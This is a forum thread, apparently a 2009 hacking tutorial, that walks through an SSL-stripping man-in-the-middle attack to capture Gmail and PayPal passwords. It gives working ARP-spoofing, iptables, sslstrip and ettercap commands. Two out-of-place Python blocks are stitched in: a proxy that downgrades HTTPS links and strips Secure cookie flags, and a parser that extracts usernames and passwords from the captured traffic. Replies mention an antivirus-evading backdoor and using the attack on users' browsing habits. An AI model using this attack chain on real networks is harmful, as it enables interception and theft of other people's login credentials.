
Thread: [Video+Tutorial] How to: Crack / Sniff SSL / HTTPS (sslstrip)

  1. #1 g0tmi1k

    [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/download.php?ykgjnkyejku
    Commands: http://pastebin.com/fd6eadf7


    What is this?

    This video shows that even with SSL encryption, it isn't secure. Proof of this is given by showing a web-based email (Google Mail) and an online bank (PayPal) password.


    How does this work?
    > Performing a 'Man In The Middle' attack, so all the traffic flows through the attacker.
    > Picks out HTTP traffic on port 80 and redirects / forwards the packets to a different port.
    > SSLStrip is listening on that port and removes the SSL connection before passing it back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Target's IP: 192.168.1.6
    Gateway: 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    # ettercap's config file is /etc/etter.conf; in the Linux section, under the iptables lines,
    # uncomment both redir_command_on and redir_command_off
    kate /etc/etter.conf
    # let the attacker's box forward the target's packets on to the real gateway
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # poison the target's ARP cache so its gateway-bound traffic comes to us (own terminal, keep running)
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    # send the target's port-80 traffic to the port sslstrip listens on (nat table, -A appends the rule)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    
    # -a log all traffic, -k kill sessions in progress, -f swap in a lock favicon; listens on 10000 by default (own terminal)
    sslstrip -a -k -f
    # text interface, quiet: prints the usernames & passwords it sees in the now-plaintext traffic (own terminal)
    ettercap -T -q -i wlan0


    Notes:

    You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!
    Video length: 03:55

    Capture length: 4:41
    Song: 16 Bit Lolitas - Nobody Seems To Care

    Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
    Forum Post: http://forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
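The stripping step in "How does this work?" above, modelled as an added example. This is not sslstrip's own code and it is not from the post; it is a small Python stand-in for what a stripping proxy listening on the redirected port does: every https:// link, form action and redirect in a response headed back to the victim is rewritten to http://, the proxy remembers which URLs it downgraded so it can fetch them from the real site over HTTPS when the victim later asks for the plain version, and the Secure flag is dropped from cookies so the victim's browser will send them over the downgraded connection. The page, hosts and headers are constructed for the example.

```python
"""Model of the HTTP/HTTPS stripping step (added example, not sslstrip's code)."""
import re
from urllib.parse import urlsplit

# Constructed response from the "real" site, as the proxy would see it upstream.
SAMPLE_PAGE = """<html><body>
<a href="https://accounts.example.com/login">Sign in</a>
<form action="https://accounts.example.com/login" method="post"></form>
<a href="http://www.example.com/about">About</a>
<script>var api = "https://api.example.com/v1/session";</script>
</body></html>"""

SAMPLE_HEADERS = [
    ("Location", "https://accounts.example.com/checkout"),
    ("Set-Cookie", "SID=abc; Path=/; Secure; HttpOnly"),
    ("Content-Type", "text/html"),
]

HTTPS_URL = re.compile(r'https://([^\s"\'<>]+)', re.IGNORECASE)


class SslStripper:
    """Sits on the port that iptables redirects the victim's port-80 traffic to.

    The victim only ever talks plain HTTP to us. We remember every URL we
    downgraded so that when the victim requests the http:// version we know
    to fetch it from the real server over HTTPS and relay the answer.
    """

    def __init__(self):
        self.stripped = set()  # (host, path) pairs we have downgraded

    def _remember(self, url):
        parts = urlsplit(url)
        self.stripped.add((parts.netloc.lower(), parts.path or "/"))

    def rewrite_body(self, body):
        """Rewrite every https:// reference in a response body to http://."""
        def downgrade(match):
            self._remember(match.group(0))
            return "http://" + match.group(1)
        return HTTPS_URL.sub(downgrade, body)

    def rewrite_headers(self, headers):
        """Downgrade an HTTPS redirect and strip the Secure cookie flag.

        Without the Secure flag the browser will send the session cookie over
        the plain-HTTP connection the victim now has with the proxy.
        """
        out = []
        for name, value in headers:
            lname = name.lower()
            if lname == "location" and value.lower().startswith("https://"):
                self._remember(value)
                value = "http://" + value[len("https://"):]
            elif lname == "set-cookie":
                value = re.sub(r";\s*secure\b", "", value, flags=re.IGNORECASE)
            out.append((name, value))
        return out

    def upstream_scheme(self, host, path):
        """Scheme to use toward the real server for a victim's plain request."""
        if (host.lower(), path or "/") in self.stripped:
            return "https"
        return "http"


if __name__ == "__main__":
    proxy = SslStripper()
    print(proxy.rewrite_body(SAMPLE_PAGE))
    print(proxy.rewrite_headers(SAMPLE_HEADERS))
    # The victim's browser now asks for http://accounts.example.com/login ...
    print(proxy.upstream_scheme("accounts.example.com", "/login"))  # https
    print(proxy.upstream_scheme("www.example.com", "/about"))       # http
```

The point to take from the model is that the server still speaks HTTPS throughout and nothing in the certificate chain is attacked; the downgrade only works because the victim's first request was plain HTTP and the browser follows whatever scheme the (rewritten) page and redirects hand it.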

  2. #2 (Just burned his ISO; joined Jul 2009; 7 posts)

    Very nice tut - keep up the good work

  3. #3 kazalku (Member; joined Feb 2009; 416 posts)

    Nice tut... one small point - the exe for the backdoor is getting caught by AV as a trojan... grrrrr It can escape half of the AVs on VirusTotal but .....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4 imported_evanuz (Just burned his ISO; joined Dec 2008; 2 posts)

    How do i save the packets?

  5. #5 freemymind

    Nice work, thanks for posting.

    Great tune to roll with, I was sad when it cut out around halfway into the video but was no big deal. Nice Video and thanks again for sharing it for others.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  6. #6 g0tmi1k

    Quote Originally Posted by kazalku:
        Nice tut... one small point - the exe for the backdoor is getting caught by AV as a trojan... grrrrr It can escape half of the AVs on VirusTotal but .....
    kazalku,
    Thanks! But I'm not using SBD this time around! Plus I don't have any AV running on my target's PC!

    evanuz,
    I use:
    sslstrip -a -k -f --write /root/output-ssl
    You can then do
    kate /root/output-ssl
    OR
    less /root/output-ssl
    OR
    grep -i username /root/output-ssl   # replace "username" with the name you are looking for
    freemymind,
    Thanks for the thanks!
    The music cuts out!? :O *goes and checks*


    Edit:
    Yup - music was missing half way! Re-uploaded (blip.tv and mediafire - links updated!)
    ~ Have you, g0tmi1k? ~
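As an added example (not from the post) of doing what the grep above does more carefully: the --write file holds the POST bodies sslstrip saw, the field names depend on the site (one login form may call them Email and Passwd, another login_email and login_password), and the values are URL-encoded, so a plain grep for an address with an @ in it misses a body where it was sent as %40. The parser below decodes each body and pulls out the credential-looking fields. The log text is constructed for the example in the rough shape of such a log; the real file layout is not copied from the tool, so the HEADER pattern is an assumption to adjust to whatever your own output-ssl file contains.

```python
"""Pull credentials out of an sslstrip-style POST log (added example)."""
import re
from urllib.parse import parse_qsl

# Constructed log text in the rough shape of an sslstrip --write file.
# The real layout is NOT copied from the tool; adjust HEADER to your file.
SAMPLE_LOG = """\
2009-07-21 20:13:02,431 POST Data (www.google.com):
GALX=abc123&Email=victim%40gmail.com&Passwd=S3cret%21&rmShown=1
2009-07-21 20:14:55,107 POST Data (www.paypal.com):
login_email=victim%40example.org&login_password=hunter2&submit.x=Log+In
2009-07-21 20:15:01,990 POST Data (www.example.com):
q=sslstrip&page=2
"""

# Assumed shape: one header line per captured POST, body on the next line.
HEADER = re.compile(r"^(?P<ts>\S+ \S+) POST Data \((?P<host>[^)]+)\):\s*$")

# Field names that usually carry a login name or a password.
CREDENTIAL_NAME = re.compile(r"user|login|email|pass|pwd", re.IGNORECASE)


def parse_post_log(text):
    """Return one record per captured POST: time, host and decoded fields."""
    records = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = HEADER.match(lines[i])
        if not m:
            i += 1
            continue
        body = lines[i + 1].strip() if i + 1 < len(lines) else ""
        # parse_qsl undoes the URL encoding, so %40 becomes @ and + a space.
        fields = dict(parse_qsl(body, keep_blank_values=True))
        records.append({"time": m.group("ts"), "host": m.group("host"), "fields": fields})
        i += 2
    return records


def extract_credentials(text):
    """Keep only the POSTs that carried credential-looking fields."""
    hits = []
    for rec in parse_post_log(text):
        creds = {k: v for k, v in rec["fields"].items() if CREDENTIAL_NAME.search(k)}
        if creds:
            hits.append({"time": rec["time"], "host": rec["host"], "credentials": creds})
    return hits


if __name__ == "__main__":
    for hit in extract_credentials(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["credentials"])
```

Run it against the real file with `python3 parse_ssl_log.py < /root/output-ssl` after swapping SAMPLE_LOG for sys.stdin.read(); the name-based filter is deliberately loose, so expect to prune false hits such as "remember_me" style fields by hand.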

  7. #7 hyperlitemofo (Just burned his ISO; joined Mar 2006; 17 posts)

    Great tutorial and tool, but I had a few problems. I was able to get everything up and running with no problem using the bt4 pre release, but the experience for the user on the target PC was not very seamless.

    While testing, I noticed that my target box was taking much longer to load sites (some didn't load at all). Many of the sites would hang with only half the page loaded and in some cases just time out completely.

    The attack was working and I was seeing my passwords in plaintext, but I couldn't get it so that the target machine seemed unchanged. In many attempts I would log into my Gmail account, but would never make it to my inbox. It would just hang or take me back to the login screen.

    Anyone else have this problem?

  8. #8 Gitsnik (Very good friend of the forum; joined Jan 2010; location: The Crystal Wind; 851 posts)

    Quote Originally Posted by hyperlitemofo:
        The attack was working and I was seeing my passwords in plaintext, but I couldn't get it so that the target machine seemed unchanged. In many attempts I would log into my Gmail account, but would never make it to my inbox. It would just hang or take me back to the login screen.
    Some websites check on the client side whether you are in SSL or not, which would be conducive to your issue here. Try proxying with a proper SSL proxy (ettercap has one) - you will get the self-signed warning, but will probably succeed in testing your account.

    I use a similar attack when the audit team requests access to particular information about a user's browsing habits; it's good to be able to watch their SSL proxy usage sometimes.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  9. #9 imported_onryo (Member; joined Apr 2009; 109 posts)

    When SSLstrip 0.2 came out I got a copy from Moxie and wrote a tut here. Even put it on a rogue AP. Props to "DarkOperator" for that script. It was so slow we talked about porting it to C. This was not on pre though, just BT4 beta. Is SSLstrip (not on a rogue AP) still ULTRA slow?

    Onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  10. #10 imported_vvpalin (Member; joined Apr 2009; 442 posts)

    Yeah, I did a write-up of running it under airbase. It's not really a problem with sslstrip but more an airbase limitation, as you can't set the MTU size on the Alfa card. Other cards should work, however.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
